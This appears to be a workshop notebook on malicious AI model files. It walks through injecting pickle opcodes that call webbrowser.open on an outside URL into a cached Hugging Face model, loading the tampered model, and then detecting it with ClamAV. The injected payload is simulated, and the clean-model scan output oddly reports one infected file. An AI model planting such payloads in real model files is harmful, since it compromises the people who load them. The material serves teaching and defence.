# Models as Malware: Attacking and Defending the AI Supply Chain
The open source model development community is growing exponentially, with over 1.8 million publicly accessible models on HuggingFace today.

Institutions and individuals alike leverage this platform to access and share state-of-the-art AI for deployment on a wide range of infrastructure, from personal devices to production systems.

Under the hood, many AI model formats are both data (weights) and code (architecture), with most users relying on easy but vulnerable serialization formats to distribute models â€” and attackers are taking notice, embedding payloads in models to connect to C2 servers:
- https://thehackernews.com/2025/02/malicious-ml-models-found-on-hugging.html (Feb 2025)
- https://arstechnica.com/security/2024/03/hugging-face-the-github-of-ai-hosted-code-that-backdoored-user-devices/ (Mar 2024)

In this session, you'll learn 1) how to instrument and detect malicious payloads in AI models and 2) how recent enhancements to ClamAV are protecting customers from supply chain compromises in the era of AI.

Working understanding of Python programming is expected.

# Analyze the new threat vector

## Load a safe model
In this case, it's a small GPT-style model trained on Shakespeare's plays. Feel free to try it out!

In [1]:
from transformers import AutoModel
model = AutoModel.from_pretrained("n8cha/nanoGPT-shakespeare-char", weights_only=False, trust_remote_code=True)

config.json:   0%|          | 0.00/388 [00:00<?, ?B/s]

model.py: 0.00B [00:00, ?B/s]

A new version of the following files was downloaded from https://huggingface.co/n8cha/nanoGPT-shakespeare-char:
- model.py
. Make sure to double-check they do not contain any added malicious code. To avoid downloading new versions of the code file, you can pin a revision.


pytorch_model.bin:   0%|          | 0.00/43.0M [00:00<?, ?B/s]

number of parameters: 10.67M


generation_config.json:   0%|          | 0.00/69.0 [00:00<?, ?B/s]

model.safetensors:   0%|          | 0.00/43.0M [00:00<?, ?B/s]

In [2]:
import torch

class CharTokenizer:
    def __init__(self):
        self.token_map = {'\n': 0, ' ': 1, '!': 2, '$': 3, '&': 4, "'": 5, ',': 6, '-': 7, '.': 8, '3': 9, ':': 10, ';': 11, '?': 12, 'A': 13, 'B': 14, 'C': 15, 'D': 16, 'E': 17, 'F': 18, 'G': 19, 'H': 20, 'I': 21, 'J': 22, 'K': 23, 'L': 24, 'M': 25, 'N': 26, 'O': 27, 'P': 28, 'Q': 29, 'R': 30, 'S': 31, 'T': 32, 'U': 33, 'V': 34, 'W': 35, 'X': 36, 'Y': 37, 'Z': 38, 'a': 39, 'b': 40, 'c': 41, 'd': 42, 'e': 43, 'f': 44, 'g': 45, 'h': 46, 'i': 47, 'j': 48, 'k': 49, 'l': 50, 'm': 51, 'n': 52, 'o': 53, 'p': 54, 'q': 55, 'r': 56, 's': 57, 't': 58, 'u': 59, 'v': 60, 'w': 61, 'x': 62, 'y': 63, 'z': 64}
        self.rev_map = {v: k for k, v in self.token_map.items()}

    def encode(self, text):
        try:
            return [self.token_map[c] for c in text]
        except KeyError as e:
            raise ValueError(f"Character not in vocabulary: {e.args[0]}")

    def decode(self, tokens):
        try:
            return ''.join(self.rev_map[t] for t in tokens)
        except KeyError as e:
            raise ValueError(f"Token not in vocabulary: {e.args[0]}")

tokenizer = CharTokenizer()

def generate(prompt):
    prompt_encoded = tokenizer.encode(prompt)
    x = (torch.tensor(prompt_encoded, dtype=torch.long, device="cpu")[None, ...])
    with torch.no_grad():
        y = model.generate(
            x,
            max_new_tokens=1000,
            temperature=0.8,
            top_k=200
        )
        return tokenizer.decode(y[0].tolist())

In [3]:
response = generate("O Romeo, Romeo, ") # This may take a while to run (~60s)
print(response)

O Romeo, Romeo, like the talk of death
Have no longer to do another blood.

MENENIUS:
But it was a brace of thee,
To make thy fellow to have one shadow:
For it is a well-a grave!

First Senator:
What satisfied?

VOLUMNIA:
Sir, the black down from the dukes
For merit, but not into the virtuous life
Of fasting but another of all the tempted like:
The prayers ever will blood to the extreme fear,
That thought you leave the foul purposed souls of yound days
And despair told me in his kindness,
May proclaim your ancient for a bush of feast,
Lest with a guilty plague may seem that with me;
And as I was this a bear, many as runs
Good cannot be will the be but knew'd,
And death happiness, means their courts, we have many inhabits
The hope of pleasure to die: 'tis so dear a tranion
To see him and pieces which we have been side a travell
That most desperate sleep in the cener? See, thou shamest;
And so, but if thou dost pity the allaying these
to make a death with a bloody man
That thus should be

## Instrument the model with (simulated) malware
During the guided session, we will use `pickle_editor.py` to instrument the serialized model file with malicious instructions.

The simulated exploit looks like this:
```
001: GLOBAL 'webbrowser open'
002: BINUNICODE 'https://pramuwaskito.org/hacker/'
003: BININT1 0
004: NEWTRUE
005: TUPLE3
006: REDUCE
```

1. `001: GLOBAL 'webbrowser open'`: Pushes the `webbrowser.open()` function onto the stack.
2. `002: BINUNICODE 'https://pramuwaskito.org/hacker/'`: Loads up the first parameter of `webbrowser.open()`, `url`.
3. `003: BININT1 0`: Loads up the second parameter of `webbrowser.open()`, `new`.
4. `004: NEWTRUE`: Loads up the third parameter of `webbrowser.open()`, `autoraise`. We'll use `True` for transparency.
5. `005: TUPLE3`: Assembles the previous 3 items into a tuple (necessary to pass the items to `webbrowser.open()` altogether).
6. `006: REDUCE`: Executes `webbrowser.open()`.

### Open the Pickle editor tool
Check the Hugging Face cache for the model files:
```shell
# Hugging Face stores the model data in a cache directory using the SHA256 checksum as the filename
# SHA256 of model: 174042ea4a88354667f5058c9fa8090140c9fdad6373e7f76dbaf4e17b92d575
# (see https://huggingface.co/n8cha/nanoGPT-shakespeare-char/blob/main/pytorch_model.bin)
ls -la ~/.cache/huggingface/hub/models--n8cha--nanoGPT-shakespeare-char/blobs
```

Save a copy of the "clean" model for later:
```shell
cp ~/.cache/huggingface/hub/models--n8cha--nanoGPT-shakespeare-char/blobs/174042ea4a88354667f5058c9fa8090140c9fdad6373e7f76dbaf4e17b92d575 ~/.cache/huggingface/hub/models--n8cha--nanoGPT-shakespeare-char/blobs/clean_174042ea4a88354667f5058c9fa8090140c9fdad6373e7f76dbaf4e17b92d575

ls -la ~/.cache/huggingface/hub/models--n8cha--nanoGPT-shakespeare-char/blobs
```

Instrument the original model with the malicious pickle opcodes listed above (this will open a `curses` editor):
```shell
python pickle_editor.py ~/.cache/huggingface/hub/models--n8cha--nanoGPT-shakespeare-char/blobs/174042ea4a88354667f5058c9fa8090140c9fdad6373e7f76dbaf4e17b92d575
```

## Test the exploit!
If all succeeds, loading the tampered model will run the malicious instructions, opening a web browser window to https://pramuwaskito.org/hacker/. 

In [None]:
from transformers import AutoModel
model = AutoModel.from_pretrained("n8cha/nanoGPT-shakespeare-char", weights_only=False, trust_remote_code=True)

# Detect (and protect) with ... ClamAV?!?
There's a new model on Hugging Face every 7 seconds, and **manually analyzing the contents of every model simply will not scale**.

If only we could leverage the _tried and true_ tools in our toolkits today ... like **ClamAV**.

---

That's right, **ClamAV** can now detect malicious signatures in AI model files, and you can try it yourself right now!

### Original model

```
> clamscan ~/.cache/huggingface/hub/models--n8cha--nanoGPT-shakespeare-char/blobs/clean_174042ea4a88354667f5058c9fa8090140c9fdad6373e7f76dbaf4e17b92d575

Loading:     7s, ETA:   0s [========================>]    8.72M/8.72M sigs
Compiling:   2s, ETA:   0s [========================>]       41/41 tasks

/nanoGPT-shakespeare-char/pytorch_model.bin: OK

----------- SCAN SUMMARY -----------
Known viruses: 8718486
Engine version: 1.4.2
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 62.07 MB
Data read: 41.00 MB (ratio 1.51:1)
Time: 0.501 sec (0 m 0 s)
Start Date: 2025:07:31 23:22:55
End Date:   2025:07:31 23:22:56
```

### Tampered model

```
> clamscan ~/.cache/huggingface/hub/models--n8cha--nanoGPT-shakespeare-char/blobs/174042ea4a88354667f5058c9fa8090140c9fdad6373e7f76dbaf4e17b92d575

Loading:     7s, ETA:   0s [========================>]    8.72M/8.72M sigs
Compiling:   2s, ETA:   0s [========================>]       41/41 tasks

/.cache/huggingface/hub/models--n8cha--nanoGPT-shakespeare-char/blobs/174042ea4a88354667f5058c9fa8090140c9fdad6373e7f76dbaf4e17b92d575: Py.Malware.NetAccess_webbrowser_G-10053733-0 FOUND

----------- SCAN SUMMARY -----------
Known viruses: 8718486
Engine version: 1.4.2
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 62.07 MB
Data read: 41.00 MB (ratio 1.51:1)
Time: 0.501 sec (0 m 0 s)
Start Date: 2025:07:31 23:22:55
End Date:   2025:07:31 23:22:56
```

### Clean up the Hugging Face cache
If you'd like to remove the instrumented model, simply clear out the Hugging Face cache, and a fresh copy of the model will be pulled the next time `from_pretrained()` is invoked:
```shell
rm -rf ~/.cache/huggingface/hub/models--n8cha--nanoGPT-shakespeare-char
````

## We hope you enjoyed this exercise and would love to stay in touch!
**Nathan**: [LinkedIn](https://www.linkedin.com/in/thisisnathanchang/), [GitHub](https://github.com/n8cha), `nathchan at cisco dot com`

**Roee**: [LinkedIn](https://www.linkedin.com/in/rlandesman/), [GitHub](https://github.com/ri-roee), `roeeland at cisco dot com`